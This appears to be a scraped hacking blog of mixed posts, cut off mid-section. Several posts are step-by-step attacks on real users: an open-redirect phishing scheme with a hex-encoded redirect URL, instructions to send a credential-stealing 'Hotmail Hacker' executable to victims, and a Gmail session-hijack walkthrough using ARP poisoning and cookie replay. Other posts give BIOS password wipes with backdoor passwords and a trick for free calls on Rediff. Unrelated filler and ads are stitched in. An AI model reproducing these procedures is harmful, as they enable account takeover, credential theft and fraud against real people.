Exploiting Redirect Vulnerabilities

I was surfing through my friend’s forum Secworm.net and read this thread about Redirection Vulnerabilities. So I thought of sharing it with you guys.

Phishing is usually considered to be most effective when it’s combined with social engineering, the hacker term for human manipulation. One way phishing can be combined with social engineering is through the exploitation of redirect vulnerabilities. This article will demonstrate to you what redirect vulnerabilities are, how to spot them, and how they can be exploited.

So first things first. What is a redirect vulnerability? A redirect vulnerability is when a webpage uses a script to redirect you to somewhere (usually another page on the website), but they write that script in such a way that it allows a hacker to manipulate it to send you to an external page instead of an internal one. There are many types of redirect vulnerabilities, but we’ll be looking at the most basic type here for now. Example: let’s say we’re logging in to webpage that has this url:

Code:

http://www.example.com/login.php?dest=members/index.html

Let’s have a look at the url. It’s all looking pretty ordinary up to login.php, but look one step after that. See the dest=members/index.html? members/index.html is the path to the index page for logged in members, so you can determine that dest=members/index.html is a parameter that is being used by the login.php script to redirect users to the member index page after a successful login. Now if the creator of the login.php script was very security conscious, they’d make sure that the dest field could never point to a url that’s not an approved destination. However, if he didn’t know about redirect vulnerabilities, he would just write the script so that it would redirect the user to whatever address dest pointed to. In order to find which one we’re dealing with for this website, we can change the dest parameter and see how the script responds. For instance:

Code:

http://www.example.com/login.php?dest=http://www.google.com

If this page is vulnerable to redirect vulnerabilities, this it should send us to google after we log in. If not, it will generate some sort of error condition and take you to a default page. So if we change the address as specified above, log in, and find ourselves looking at google instead of example.com, then we know it’s vulnerable to redirect vulnerabilities.

Now that you know what redirect vulnerabilities are, can you see how they can be applied to phishing? Let me create a scenario to give you an idea of how redirect vulnerabilities can be used to increase the effectiveness of phishing. Imagine yourself to be a student at a university. You have a school website with the address http://www.myschool.com, and you log in to all your school services (such as mail, course info, etc) through the url

Code:

www.sys.myschool.com/login.php?service=

where the service parameter points to the address of the service being accessed, as demonstrated in the following urls:

Code:

http://www.portal.myschool.com/login.php?service=sys/mail.php

or

http://www.portal.myschool.com/login.php?service=sys/courseInfo.php

Phishers have been targeting students of your school lately, so your system administrators have sent everyone an email telling them to check the url of every webpage they log into with their school account to make sure it’s an actual school page and not a phishing page. A hacker is aware of this, and realizing that this advice will give the you and the other students a false sense of security when you’re on pages that are actual school pages, set out looking for a way to get students to access his phishing page from within the school login system itself. He sees the above urls and recognizes their potential to be vulnerable to redirect exploitation and creates a phishing page that looks exactly like your school’s page that is displayed to you when your login fails. Being a phishing page, it sends him all the login credentials of everyone who logs in through it. Once he knows that the login script is indeed vulnerable, he creates a link to his phishing page from the school login page, hoping that students will log in to the school through his link, get redirected to his fake page, enter their information again without realizing that they left the school page, and then become redirected back to their school page without even noticing that anything out of the ordinary had happened. He starts out with a link like this:

Code:

http://www.portal.myschool.com/login.php?service=http://badsite.com/fakePage.php

However, he realizes that some of the more observant students might see the external address in the url and be too wary to enter their information, so he changes his url into its hexidecimal representation, either by memory or using a tool like this one: http://secworm.net/showthread.php?tid=3, and achieves an ordinary-looking url like this one:

Code:

http://www.portal.myschool.com/login.php?service=%68%74%74%70%3a%2f%2f%62%61%64%73%69%74%65%2e%63%6f%6d%2f%66%61%6b%6 ?5%50%61%67%65%2e%70%68%70

This url gives no indication that it actually redirects students to the hacker’s phishing page, and since you see your school’s domain in the beginning, you and the students think nothing of it. The hacker then sends this link along with an email making the reader want to log in to the student database and steals all their passwords.

Hopefully this will help you understand the basics of redirect vulnerabilities and how they can be used to increase the effectiveness of phishing.

Via. www.Secworm.net

Read More

Get Your Website Secured – Free Penetration Service

The question which screw every webmaster’s mind is “How secure my website is?”. Every webmaster is very keen about their website’s security because they do not want to compromise any of the data on it. I have seen many websites getting hacked every now and then. Not only user’s personal information gets compromised but also reputation of the site goes down to zero! There are some professional Ethical hackers who provides Penetration Testing services for websites, but it costs like $500 and above to get any website tested, which not every one can afford.

I found this interesting offer while surfing through SecWorm.net. SecWorm is HackingArticle’s affiliate. Its a forum about Hardcore security and Ethical hacking. Staff of secworm is very much experienced in security field. I have seen them testing many websites and applications and helping people to secure their stuffs.

I noticed they have started this service called “FREE PENETRATION AND BETA TESTING FOR ANY TYPE OF WEBSITE!”, and I was like WHOA!, it is really a good way to help webmasters. One of the staff member of Secworm is my good friend. I asked him why would you provide such an expensive service for free. His answer impressed me, only thing he said was “SecWorm’s slogan is Human Knowledge if for the world, Support Open Source and thats exactly what we are doing.” It made sense to me.

I trust SecWorm people because they have helped me fixing few security issues with HackingArticles. So Any of you want to get your website checked you can visit www.SecWorm.net.

READ THIS TO GET DETAILED INFORMATION.

Read More

Windows 7 God Mode

Windows 7 is predominantly the best OS ever in the history of Microsoft. But, do you know that it has a GodMode within it ?

There is a hidden “GodMode” feature that lets a user access all of the operating system’s control panel features from within a single folder.

To enter “GodMode,” one need to create a new folder and then rename the folder to the following:

GodMode.{ED7BA470-8E54-465E-825C-99712043E01C}

Just try it..:)

Found some more of Microsoft’s inbuilt godmode dev tools-

http://news.cnet.com/8301-13860_3-10426627-56.html

Append each of these after “FolderName.”

{00C6D95F-329C-409a-81D7-C46C66EA7F33}

{0142e4d0-fb7a-11dc-ba4a-000ffe7ab428}

{025A5937-A6BE-4686-A844-36FE4BEC8B6D}

{05d7b0f4-2121-4eff-bf6b-ed3f69b894d9}

{1206F5F1-0569-412C-8FEC-3204630DFB70}

{15eae92e-f17a-4431-9f28-805e482dafd4}

{17cd9488-1228-4b2f-88ce-4298e93e0966}

{1D2680C9-0E2A-469d-B787-065558BC7D43}

{1FA9085F-25A2-489B-85D4-86326EEDCD87}

{208D2C60-3AEA-1069-A2D7-08002B30309D}

{20D04FE0-3AEA-1069-A2D8-08002B30309D}

Example- Hacking.{ash23-ifsdf..u know now!}

Now Go and “GOD MODE YOURSELF”.

Read More

Isaac Newton on Google logo with dropping Apple

As I was browsing Google today I noticed a new logo which Google created to honor Sir Isaac Newton. The logo has an animated falling Apple and it’s missing an “o” from it. Google usually decorates their logo whenever they want to celebrate a special day, and today happens to be one of them. Isaac Newton was born on January 4.

Isaac Newton is well known for his three laws of motion. Google created an animation of the falling Apple because that is what inspired him to come up with the gravitational formula. I’m posting it here because I know many of you here useGoogle to find our website, and you will definitely wonder why the logo is on Google. I’m also a big fan of Isaac Newton!

Read More

How to Shutdown Computer automatically Using Firefox Auto Shutdown Add-on

Firefox is the top most world widely used web browser. Because it is handy and have lots of features though its add-on and extension. Sometimes we download files using Firefox and on the same time we need to go for some work. So until we come back the computer waste the energy. In this situation we can use Firefox Auto shutdown the computer when downloads are completed and helps us to save electric power.

Auto Shutdown is a cool Firefox add-on which controls your active download and shut down the computer when downloads are completed through is auto executing user script. Not only this but if Firefox is running idle it also shut downs the pc automatically with pre defined shut down time.

If you are using Downthemall Firefox extension for downloading movies, video, music and images from web then you can easily integrate Auto shutdown Firefox extension with downthemall add-on.

Read More

Make Your Keyboard Lights Do DISCO

Howdy Friends!

This trick just makes your keyboard lights go crazy and do disco. LoL.

The script I’m sharing with you, when executed makes your Caps, Num and Scroll Lock’s light flash in a cool rhythmic way!

1.This piece of code makes ur keyboard a live disco..

Set wshShell =wscript.CreateObject(“WScript.Shell”)

do

wscript.sleep 100

wshshell.sendkeys “{CAPSLOCK}”

wshshell.sendkeys “{NUMLOCK}”

wshshell.sendkeys “{SCROLLLOCK}”

loop

2.This one makes it looks like a chain of light….

Set wshShell =wscript.CreateObject(“WScript.Shell”)

do

wscript.sleep 200

wshshell.sendkeys “{CAPSLOCK}”

wscript.sleep 100

wshshell.sendkeys “{NUMLOCK}”

wscript.sleep 50

wshshell.sendkeys “{SCROLLLOCK}”

loop

Instructions:

*paste any of the two above codes in notepad

*Save as “AnyFileName”.vbs

*Run the file

*To stop, launch task manager and then under “Processes” end “wscript.exe”

I hope u would like it..

Feel Free To Share This Post!

Read More

Wordpress 2.9 Carmen Now Available

Howdy Wordpress Lovers!

I woke up in the morning today and as usual I logged into my Wordpress admin account and guess what,

I saw this on the top of my admin panel:

Hell yeah! Wordpress 2.9 has just been launched today. Its called “Carmen” [named in honor of magical jazz vocalist Carmen McRae].

This was the most surprising update for me as Wordpress released the ‘Wordpress 2.9 RC’ just 2 days back. So what’s new in this version? How is it different from the older ones? Wordpress answered these questions like this:

1. Global undo/”trash” feature, which means that if you accidentally delete a post or comment you can bring it back from the grave (i.e., the Trash). This also eliminates those annoying “are you sure” messages we used to have on every delete.

2. Built-in image editor allows you to crop, edit, rotate, flip, and scale your images to show them who’s boss. This is the first wave of our many planned media-handling improvements.

3. Batch plugin update and compatibility checking, which means you can update 10 plugins at once, versus having to do multiple clicks for each one, and we’re using the new compatibility data from the plugins directory to give you a better idea of whether your plugins are compatible with new releases of WordPress. This should take the fear and hassle out of upgrading.

4. Easier video embeds that allow you to just paste a URL on its own line and have it magically turn it into the proper embed code, with Oembed support for YouTube, Daily Motion, Blip.tv, Flickr, Hulu, Viddler, Qik, Revision3, Scribd, Google Video, Photobucket, PollDaddy, and WordPress.tv (and more in the next release).

Well there are more new features and tweaks but the above mentioned are the BIG ones!

Are you a Wordpress fanatic?

So what are you waiting for? Go ahead and try “CARMEN”!

Download Wordpress 2.9

Yes, I need to tell you one more important thing.

Don’t forget to take a backup of your blog before you upgrade your Wordpress!

Happy Blogging!

Feel Free to share this post!

Read More

Hack To Make Free Calls

STD call rates are reducing in India every day, but still, they are not free. Today I bring you a hack to make free STD calls. I am exploiting a loophole in Rediff’s ad service. You can search for an ad on Rediff local ads and call the advertiser through Rediff. Rediff will call you first and then connect you with the advertiser of that ad. In this hack you basically need to post one ad, with your phone number. After that, every time you have to call a friend, you can search for that ad and pretend to be your friend. you want to call. Rediff will thus, call you as the advertiser and it will call your friend whose number you provided. Confused? Let me explain it step by step.

1) Go to http://localads.rediff.com

2) Click on Post ad (free) button.

3) Fill out the form and enter your Mobile number. Here, you should advertise something which is easier to search.

4) Post your ad and and wait for some time. Usually it takes around 40-45 minutes at max.

5) Search your ad and provide your friend’s number as the number to be connected with advertiser of that ad (you).

That is it. You made a free STD call. The catch is that one call lasts for only 1:30 minutes. Additionally, there is a limit of calls made per ad per week. However, they let you post multiple ads with same mobile number. That is you can do away with this weekly limit easily.

Read More

How To Hide Files In A Calculator?

Having read the title of this post you may be wondering if it’s really possible. Yeah! It is possible. As the word suggests, it’s a calculator with a safe which is capable of storing and keeping your files and folders safe. The safe calculator looks just like the default calculator in Windows and in fact it can even perform calculations just like any other calculator. When you start Safe Calculator it will look just like the below pic.

The default code/ pin for the safe is ‘123’. So, to unlock you need to type ‘123’ in the calculator and press on ‘MS’, now the calculator will enter into safe mode. Here you can change the default pin if you want by clicking on ‘New pin’.

Now click on ‘+’ and then ‘=’ to confirm and enter into the safe to browse and choose the files you want to hide. Click on ‘Store’ once you’re done.

Download Safe Calculator

Read More

HP Ink Cartridges

These days, HP is at the forefront of eco-friendly printing technology, and so are we. With some of the best remanufactured HP ink cartridges in the business, you can get the ink you need without harming Mother Earth.

Why Remanufactured HP Ink Cartridges?

If you’re going green in other aspects of your life, here’s something to consider. Forty-thousand tons of plastic can be saved from landfills every year if every single ink cartridge was recycled, and the best way to support the effort is not only to recycle your used cartridges, but to buy remanufactured ink cartridges as well.

Our remanufactured HP ink cartridges have been thoroughly cleaned, and anything that needs to be replaced is. Then it is refilled and carefully tested to ensure quality. Because we offer a 100% satisfaction guarantee, you can rest assured that you’re getting a top-of-the-line product that may actually outlast the OEM cartridges available. What’s more, you’re saving one more cartridge from a landfill, and that’s an essential line of thought these days.

Are They Reliable?

Absolutely. Many customers who are new to the world of remanufactured ink cartridges are actually quite surprised when their purchases outlast their OEM cartridges of days past. Because our testing process is one of the most rigorous in the industry, you get high-quality HP ink cartridges without the price tag you typically expect to see.

What If I Don’t Want A Remanufactured Model?

If you’re still not sold on the concept, it’s okay. Depending on your printer model, we typically carry the OEM ink cartridges for your printer as well. Because our prices are typically lower than many of our competitors – and we offer great customer service as well – you can turn to InkCartridges.com for all of your needs, whether you wish to go with our remanufactured choices or the originals.

Ready to get started?

Read More

Hack MSN Hotmail Using Hotmail Hacker [TUTORIAL]

Hi Hackers,

THIS POST IS FOR EDUCATIONAL PURPOSES ONLY.

FEEL FREE TO DIGG THIS POST.

After the Gmail Hacker, here comes another software to hack MSN Hotmail accounts.

Step by Step Guide of Hotmail Hacker – Hack Hotmail password:

1. Click HERE to download Hotmail Hacker.

2. Download Winrar (free download here) to extract Hotmail Hacker Builder.

3. Run, Hotmail hacker builder.exe file to see:

4. Now, enter your email account address, password and also the subject of email you want to receive. This email will contain the password you wanna hack. Also select appropriate smtp server address. You can use SMTP Server Addresses for this. Avoid use of hotmail email account. Can use gmail, yahoo or such. Click on “Build”. This will create your own Hotmail hacker in Hotmail hacker folder.

5. Now, send this Hotmail Hacker.exe file to the victim whom you wanna hack and tell him that this Hotmail hacker software is used to hack Hotmail password. Convince him that he can hack anyone’s hotmail password using this Hotmail hacker. Ask him to run Hotmail Hacker.exe and enter all information (which includes his Hotmail id and password plus Hotmail id of the victim he wanna hack).

6. As he enters this information and hits “Login And Start”, he will receive error message as shown below:

7. And you will receive a mail in your inbox like this one shown below:

8. Congrats! You’re done. You just got his email id and password.

Read More

15 Google Chrome Shortcuts to Save Your Time

Print this out, bookmark it, or remember this list of 15 useful and basic shortcuts.

Feel free to DIGG THIS post!

Open a new window: Ctrl+N

Open link in a new tab: Press Ctrl, and click a link

Open link in a new window: Press Shift, and click a link

Close current window: Alt+F4

Open a new tab: Ctrl+T

Reopen the last tab you’ve closed: Ctrl+Shift+T

Close current tab or pop-up: Ctrl+W or Ctrl+F4

Switch to the last tab: Ctrl+9

Switch to the next tab: Ctrl+Tab or Ctrl+PgDown

Switch to the previous tab: Ctrl+Shift+Tab or Ctrl+PgUp

Open your web address in a new tab: Type a web address, then press Alt+Enter

Highlight content in the web address area: F6 or Ctrl+L or Alt+D

View the History page: Ctrl+H

View the Downloads page: Ctrl+J

Read More

Shutdown your PC remotely using Twitter and TweetMyPC

Hello to all the readers of Hacking Articles.

Feel Free to DIGG THIS POST guys.

Twitter is powerful and simple indeed. But then developers were not stopping on creating and obviously developing new applications to make it even stronger. TweetMyPC is a freeware application which enables you to utilize Twitter as a way of sending commands to your PC remotely.

Sending commands to your PC remotely sounds very cool. But the negative thing here is that TweetMyPC only provides Shutdown, restart, and log off commands for now.

Though, it is still a very good application. So, to start things up, it’s recommended to create a separate Twitter account for this one. Then download and install TweetMyPC on your computer. Login your Twitter account on TweetMyPC and you’re on the go. Just tweet the command and TweetMyPC will do it for you. Very simple.

Available Commands:

• Shutdown


• Restart


• Logoff

Take note that these commands are case sensitive.

Download TweetMyPC here.

Read More

Get Free Demonoid Invitation Codes (Code Generator)

Hey Friends,

This is an amazing website which can help you create free Demonoid invitation codes but it takes a lot of time (it’s worth a try !).I got this amazing video at Youtube and was quite useful though it is a slow process



First go to this site Getinvites.org and then follow the given steps.

1.Create an account over there and do all the activation and stuff. 2.Then click on “Get An Invite” and this might take some days for your invitation to arrive ! And here is the video : CLICK HERE TO WATCH THE VIDEO ON YOUTUBE!

Read More

Google Wave Invite Giveaway

I received my supply of invites for Google Wave recently. Its been almost one month since I am using Wave but did not have he capacity to invite others. Today, Google bestowed in me the power to invite 8 people to Google Wave.

For those, unfamiliar with the term, Google Wave is a kind of collaboration tool which works in realtime. What this means is that you can see your friends type each alphabet as and when they type.

I like to call it :

Demise of the Backspace Key

Its a plus point and a negative point also. Imagine, typing something which gets viewed the same instant as you punch in the keys!

Google Wave is still in development phase and it would not be fair to jump to conclusions so soon. To draw an analogy “Who knew twitter could be such a rage?” Let’s wait and watch how Wave matures with time.

For readers of Hacking Articles, I would be giving away Google Wave invites!

How to get Google Wave Invite?

Each participant stands a chance to win a invite to Google Wave on a first-come-first-serve basis. All you have to do is :

READ CAREFULLY…

• Subscribe to HackingArticles via Email [Do remember to confirm your subsciption]


• Tweet about this Post & follow us on Twitter


• Join us on Google Friend Connect


• Leave a comment confirming your entry after you are done with above 3 steps



How will I know if I won?




I will email the winners personally because Wave invites are not sent by Google immediately, it may take a day or two to arrive at your inbox. Google is overworked with wave invites so I’ll confirm the winners with the news till they receive the invite from Google. Just be sure to follow the above mentioned steps in totality.




How many invites are up for Grabs?




Originally, Google has granted us with the power to invite 8 people to Wave. As the invites are sent out, the number of available invites will keep reducing so hurry up!




For proof, image is shown below:

Number of invites left : 7

All the best guys! See you on Wave.

Read More

How To Access Blocked Websites?

How to access blocked websites like Facebook, MySpace, Bebo at school or office?

This article suggests workarounds to help you unblock access to restricted websites at universities, school and offices.

Background: Blocking access to undesirable Web sites has been a common government tactic but China, Iran, Saudi Arabia are believed to extend greater censorship over the net than any other country in the world.

Most of the blocked or blacklisted sites in Saudi Arabia, Kuwait and all other GCC countries are about sex, religion, women, health, politics and pop culture. They even block access to websites that sell swimming or bathing suits. In China, websites that talk about sex, Tibet or Democracy are blocked.

Social sites that are often blocked include Google News, Typepad, ebay, Blogger blogs, YouTube, Facebook, Bebo, Myspace, Orkut, MySpace, Pandora, Bebo, Photobucket, Yahoo! Messenger, AOL AIM, Flickr, last.fm, etc.

Proxy websites allows us to bypass our current ISP’s IP and connect to targeted website with a different IP; thus hiding our actual origin from detectable. Internet users use proxy websites for various reasons, some to access websites potentially blocked by their colleges or workplace, some use it to test their scripts. I frequently used them to test geo-location ads or to check if DNS are properly propagated when I adjust their settings.

Instead of changing proxy address (old trick) each time, here’s my personal collection on proxy websites. Full list.

90+ Proxy Websites To Access Blocked Websites

1. http://www.hidemyass.com


2. http://www.anonymizer.com


3. http://www.wujie.net


4. http://www.ultrareach.net


5. http://surfshield.net


6. http://www.guardster.com/subscription/proxy_free.php


7. http://anonymouse.ws/anonwww.html


8. http://www.browser-x.com


9. http://www.spysurfing.com


10. http://www.xerohour.org/hideme


11. http://www.proxyz.be


12. http://www.sc0rian.com/prox


13. https://www.proxify.us


14. http://kproxy.com/index.jsp


15. http://www.brawl-hall.com/pages/proxy.php


16. http://www.proxify.net


17. http://proxy.computersteroids.com/index0.php


18. http://www.unipeak.com


19. http://flyproxy.com


20. http://alienproxy.com


21. http://proxify.com/


22. http://www.unfilter.net


23. http://www.proxymouse.com


24. http://www.surfonym.com/cgi-bin/nph-proxy


25. http://www.superproxy.be/browse.pl


26. http://www.websiteguru.com/mrnewguy


27. http://www.letsproxy.com


28. http://www.fsurf.com


29. http://indianproxy.com


30. http://www.letmeby.com


31. http://Boredatschool.net


32. http://www.ibypass.org


33. http://www.ipzap.com/


34. https://proxify.biz


35. http://kproxy.com/index.jsp


36. http://www.attackcensorship.com/attack-censorship.html


37. http://mrnewguy.com


38. http://www.evilsprouts.co.uk/defilter


39. http://www.proxify.info


40. http://www.torify.com


41. http://www.switchproxy.com


42. http://www.proxifree.com


43. http://www.secure-tunnel.com/


44. http://www.proxify.cn


45. http://www.arnit.net/utilities/webproxy/new


46. http://www.proxify.co.uk


47. http://www.betaproxy.com


48. http://www.proxify.org


49. http://www.proxychoice.com


50. http://www.proxysnail.com


51. http://www.anonypost.com


52. http://www.thestrongestlinks.com


53. http://www.hujiko.com


54. http://www.anonproxy.info


55. http://www.peoplesproxy.com


56. http://www.freeproxy.us


57. http://www.proxyweb.net


58. http://www.nopath.com


59. http://urlencoded.com


60. http://www.pole.ws


61. http://www.browseany.com


62. http://www.spiderproxy.com


63. http://www.clickcop.com


64. http://www.sneakysurf.com


65. http://www.mywebtunnel.com


66. http://www.thewebtunnel.com


67. http://www.3proxy.com


68. http://www.yourfreeproxy.com


69. http://www.proxy7.com


70. http://www.fireprox.com


71. http://www.stupidcensorship.com


72. http://www.letsproxy.com


73. http://www.sneak2.com


74. http://www.cecid.com


75. http://www.freeproxy.ca


76. http://www.ibypass.org


77. http://www.goproxing.com


78. http://www.projectbypass.com/


79. http://www.ipsecret.com


80. http://www.nomorelimits.net


81. http://www.proxify.de


82. http://www.bywhat.com


83. http://www.snoopblocker.com


84. http://www.anonymizer.ru


85. http://www.proxyking.net/


86. http://www.perlproxy.com


87. http://www.proxylord.com


88. http://tntproxy.com


89. http://satanproxy.com


90. http://zombieinvasion.info


91. http://demonproxy.com


92. http://www.myfreeproxy.com


93. http://www.gezcem.com/nph-proxy.pl.old


94. http://mpleger.de


95. http://www.the-cloak.com/login.html

Disclaimer

Note that not all of them are working perfectly; some of these websites could be offline too. I’m not encouraging you to use this to bypass sites that you are banned from surfing in colleges, work place, etc. Use them with cautions make sure you know what you are doing. I shall not be responsible for any damages or rules and regulation you violate from using these proxies.

Read More

Enable the (Hidden) Administrator Account on Windows 7 or Vista

Many people familiar with prior versions of Windows are curious what happened to the built-in Administrator account that was always created by default. Does this account still exist, and how can you access it?

The account is created in Windows 7 or Vista, but since it’s not enabled you can’t use it. If you are troubleshooting something that needs to run as administrator, you can enable it with a simple command.

Note: You really shouldn’t use this account for anything other than troubleshooting. In fact, you probably shouldn’t use it at all.

Enable Built-in Administrator Account

First you’ll need to open a command prompt in administrator mode by right-clicking and choosing “Run as administrator” (or use the Ctrl+Shift+Enter shortcut from the search box)

Now type the following command:

net user administrator /active:yes

You should see a message that the command completed successfully. Log out, and you’ll now see the Administrator account as a choice. (Note that the screenshots are from Vista, but this works on Windows 7 too)

You’ll note that there’s no password for this account, so if you want to leave it enabled you should change the password.

Disable Built-in Administrator Account

Make sure you are logged on as your regular user account, and then open an administrator mode command prompt as above. Type the following command:

net user administrator /active:no

The administrator account will now be disabled, and shouldn’t show up on the login screen anymore.

Read More

Hacking Gmail account using GX Cookie

Disclaimer: This post is only for educational purpose.

Introduction

Hacking web application was always curious for the script kiddies. And hacking free web email account is every geek first attempt. The method which I will describe in this post is not new; the same method can be applied to yahoo and other free web email services too.

The method we will be using is cookie stealing and replaying the same back to the Gmail server. There are many ways you can steal cookie, one of them is XSS (Cross site scripting) discussed by other is earlier post. But we won’t be using any XSS here, in our part of attack we will use some local tool to steal cookie and use that cookie to get an access to Gmail account.

Assumption:

• You are in Local Area Network (LAN) in a switched / wireless environment : example : office , cyber café, Mall etc.


• You know basic networking.

Tool used for this attack:

• Cain & Abel


• Network Miner


• Firefox web browser with Cookie Editor add-ons

Attack in detail:

We assume you are connected to LAN/Wireless network. Our main goal is to capture Gmail GX cookie from the network. We can only capture cookie when someone is actually using his gmail. I’ve noticed normally in lunch time in office, or during shift start people normally check their emails. If you are in cyber café or in Mall then there are more chances of catching people using Gmail.

We will go step by step,

If you are using Wireless network then you can skip this Step A.

A] Using Cain to do ARP poisoning and routing:

Switch allows unicast traffic mainly to pass through its ports. When X and Y are communicating eachother in switch network then Z will not come to know what X & Y are communicating, so inorder to sniff that communication you would have to poison ARP table of switch for X & Y. In Wireless you don’t have to do poisoning because Wireless Access points act like HUB which forwards any communication to all its ports (recipients).

• Start Cain from Start > Program > Cain > Cain


• Click on Start/Stop Sniffer tool icon from the tool bar, we will first scan the network to see what all IPs are used in the network and this list will also help us to launch an attack on the victim.


• Then click on Sniffer Tab then Host Tab below. Right click within that spreadsheet and click on Scan Mac Addresses, from the Target section select

All hosts in my subnet and then press Ok. This will list all host connected in your network. You will notice you won’t see your Physical IP of your machine in that list.

How to check your physical IP ?

> Click on start > Run type cmd and press enter, in the command prompt type

Ipconfig and enter. This should show your IP address assign to your PC.

It will have following outputs:

Ethernet adapter Local Area Connection:

Connection-specific DNS Suffix . : xyz.com

IP Address. . . . . . . . . . . . : 192.168.1.2

Subnet Mask . . . . . . . . . . . : 255.255.255.0

Default Gateway . . . . . . . . . : 192.168.1.1

Main thing to know here is your IP address and your Default Gateway.

Make a note of your IP Address & default gateway. From Cain you will see list of IP addresses, here you have to choose any free IP address which is not used anywhere. We assume IP 192.168.1.10 is not used anywhere in the network.

• Click on Configure > APR > Use Spoofed IP and MAC Address > IP

Type in 192.168.1.10 and from the poisoning section click on “Use ARP request Packets” and click on OK.

• Within the Sniffer Tab , below click on APR Tab, from the left hand side click on APR and now click on the right hand top spreadsheet then click on plus sign tool from top. The moment you click that it will show you list of IP address on left hand side. Here we will target the victim IP address and the default gateway.

The purpose is to do ARP poisoning between victim and the default gateway and route the victim traffic via your machine. From the left side click on Victim IP address, we assume victim is using 192.168.1.15. The moment you click on victim IP you will see remaining list on the right hand side here you have to select default gateway IP address i.e. 192.168.1.1 then click on OK.

• Finally, Click on Start/Stop Sniffer tool menu once again and next click on Start/Stop APR. This will start poisoning victim and default gateway.

B] Using Network Miner to capture cookie in plain text

We are using Network miner to capture cookie, but Network miner can be used for manythings from capturing text , image, HTTP parameters, files. Network Miner is normally used in Passive reconnaissance to collect IP, domain and OS finger print of the connected device to your machine. If you don’t have Network miner you can use any other sniffer available like Wireshark, Iris network scanner, NetWitness etc.

We are using This tool because of its ease to use.

• Open Network Miner by clicking its exe (pls note it requires .Net framework to work).


• From the “—Select network adaptor in the list—“ click on down arrow and select your adaptor If you are using Ethernet wired network then your adaptor would have Ethernet name and IP address of your machine and if you are using wireless then adaptor name would contain wireless and your IP address. Select the one which you are using and click on start.

Important thing before you start this make sure you are not browsing any websites, or using any Instant Mesaging and you have cleared all cookies from firefox.

• Click on Credential Tab above. This tab will capture all HTTP cookies , pay a close look on “Host” column you should see somewhere mail.google.com. If you could locate mail.google.com entry then in the same entry right click at Username column and click on “copy username” then open notepad and paste the copied content there.


• Remove word wrap from notepad and search for GX in the line. Cookie which you have captured will contain many cookies from gmail each would be separated by semicolon ( GX cookie will start with GX= and will end with semicolon you would have to copy everything between = and semicolon

Example : GX= axcvb1mzdwkfefv ; ßcopy only axcvb1mzdwkfefv

Now we have captured GX cookie its time now to use this cookie and replay the attack and log in to victim email id, for this we will use firefox and cookie editor add-ons.

C] Using Firefox & cookie Editor to replay attack.

• Open Firefox and log in your gmail email account.


• from firefox click on Tools > cookie Editor.


• In the filter box type .google.com and Press Filter and from below list search for cookiename GX. If you locate GX then double click on that GX cookie and then from content box delete everything and paste your captured GX cookie from stepB.4 and click on save and then close.


• From the Address bar of Firefox type mail.google.com and press enter, this should replay victim GX cookie to Gmail server and you would get logged in to victim Gmail email account.


• Sorry! You can’t change password with cookie attack.

How to be saved from this kind of attack?

Google has provided a way out for this attack where you can use secure cookie instead of unsecure cookie. You can enable secure cookie option to always use https from Gmail settings.

Settings > Browser connection > Always use https

Read More

A Port Scanner in VB

A small but effective tool (if you know the right way to use it..you might do wonders..)

——————–

you need:

2 textboxes

1 listbox

3 commandbuttons

1 timer

1 winsock control

——————–

 
 
Private Sub Command1_Click() 
  Timer1.Enabled = True 
End Sub 
 
Private Sub Command2_Click() 
  Timer1.Enabled = False 
  Text2.Text = "0" 
End Sub 
 
Private Sub Command3_Click() 
  List1.Clear 
End Sub 
 
Private Sub Timer1_Timer() 
  On Error Resume Next 
  Winsock1.Close 
  Text2.Text = Int(Text2.Text) + 1 
  Winsock1.RemoteHost = Text1.Text 
  Winsock1.RemotePort = Text2.Text 
  Winsock1.Connect 
End Sub 
 
Private Sub Winsock1_Connect() 
 List1.AddItem Winsock1.RemotePort & " is open!" 
End Sub
 
 

——————–

Explanation:

text1 = IP to scan

text2 = starting port

list1 = list where all open ports are shown

command1 = start

command2 = stop and reset

command3 = clear port list

timer1 = will make the winsock control to try ports

Read More

Basic BIOS password crack

This is a password hack but it clears the BIOS such that the next time you start the PC, the CMOS does not ask for any password. Now if you are able to bring the DOS prompt up, then you will be able to change the BIOS setting to the default. To clear the CMOS do the following:

Get DOS prompt and type:

Code:

DEBUG hit enter
-o 70 2e hit enter
-o 71 ff hit enter
-q hit enter
exit hit enter

Restart the computer. It works on most versions of the AWARD BIOS.

Accessing information on the hard disk

When you turn on the host machine, enter the CMOS setup menu (usually you have to press F2, or DEL, or CTRL+ALT+S during the boot sequence) and go to STANDARD CMOS SETUP, and set the channel to which you have put the hard disk as TYPE=Auto, MODE=AUTO, then SAVE & EXIT SETUP. Now you have access to the hard disk.

Standard BIOS backdoor passwords

The first, less invasive, attempt to bypass a BIOS password is to try on of these standard manufacturer’s backdoor passwords:

AWARD BIOS

AWARD SW, AWARD_SW, Award SW, AWARD PW, _award, awkward, J64, j256, j262, j332, j322, 01322222, 589589, 589721, 595595, 598598, HLT, SER, SKY_FOX, aLLy, aLLY, Condo, CONCAT, TTPTHA, aPAf, HLT, KDD, ZBAAACA, ZAAADA, ZJAAADC, djonet

AMI BIOS

AMI, A.M.I., AMI SW, AMI_SW, BIOS, PASSWORD, HEWITT RAND, Oder

Other passwords you may try (for AMI/AWARD or other BIOSes)

LKWPETER, lkwpeter, BIOSTAR, biostar, BIOSSTAR, biosstar, ALFAROME, Syxz, Wodj

Note that the key associated to “_” in the US keyboard corresponds to “?” in some European keyboards (such as Italian and German ones), so — for example — you should type AWARD?SW when using those keyboards. Also remember that passwords are Case Sensitive. The last two passwords in the AWARD BIOS list are in Russian.

Flashing BIOS via software

If you have access to the computer when it’s turned on, you could try one of those programs that remove the password from the BIOS, by invalidating its memory. However, it might happen you don’t have one of those programs when you have access to the computer, so you’d better learn how to do manually what they do. You can reset the BIOS to its default values using the MS-DOS tool DEBUG (type DEBUG at the command prompt. You’d better do it in pure MS-DOS mode, not from a MS-DOS shell window in Windows). Once you are in the debug environment enter the following commands:

AMI/AWARD BIOS

Code:

O 70 17
O 71 17
Q

PHOENIX BIOS

Code:

O 70 FF
O 71 17
Q

GENERIC

Invalidates CMOS RAM.

Should work on all AT motherboards

(XT motherboards don’t have CMOS)

Code:

O 70 2E
O 71 FF
Q

Note that the first letter is a “O” not the number “0″. The numbers which follow are two bytes in hex format.

Flashing BIOS via hardware

If you can’t access the computer when it’s on, and the standard backdoor passwords didn’t work, you’ll have to flash the BIOS via hardware. Please read the important notes at the end of this section before to try any of these methods.

Using the jumpers

